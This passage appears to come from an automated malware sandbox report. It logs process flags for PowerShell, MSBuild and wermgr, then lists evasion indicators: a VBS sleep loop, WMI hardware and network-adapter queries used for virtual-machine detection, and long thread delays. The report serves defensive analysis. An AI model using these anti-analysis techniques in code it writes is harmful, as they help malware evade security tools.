                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                  Malware Analysis System Evasion

                  barindex
                  Potential evasive VBS script found (sleep loop)
                  Source: C:\Windows\System32\wscript.exeDropped file: Do While CompteurIterations < 10000 ' Limite d'iterations pour demonstration WScript.Sleep 10000Jump to dropped file
                  Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: C00000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 2660000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 2470000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                  Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5765Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4127Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow / User API: threadDelayed 2714Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow / User API: threadDelayed 1016Jump to behavior
                  Source: C:\Windows\System32\wscript.exe TID: 3292Thread sleep time: -90000s >= -30000sJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5276Thread sleep time: -8301034833169293s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4308Thread sleep time: -9223372036854770s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4308Thread sleep time: -100000s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3920Thread sleep count: 2714 > 30Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4308Thread sleep time: -99874s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4308Thread sleep time: -99765s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3920Thread sleep count: 1016 > 30Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4308Thread sleep time: -99656s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4308Thread sleep time: -99546s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4308Thread sleep time: -99435s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4308Thread sleep time: -99321s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4308Thread sleep time: -99193s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4308Thread sleep time: -99048s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4308Thread sleep time: -98921s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4308Thread sleep time: -98812s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4308Thread sleep time: -98703s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4308Thread sleep time: -98593s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4308Thread sleep time: -98484s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4308Thread sleep time: -98374s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4308Thread sleep time: -98265s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4308Thread sleep time: -98156s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4308Thread sleep time: -98046s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4308Thread sleep time: -97937s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4308Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 100000Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 99874Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 99765Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 99656Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 99546Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 99435Jump to behavior
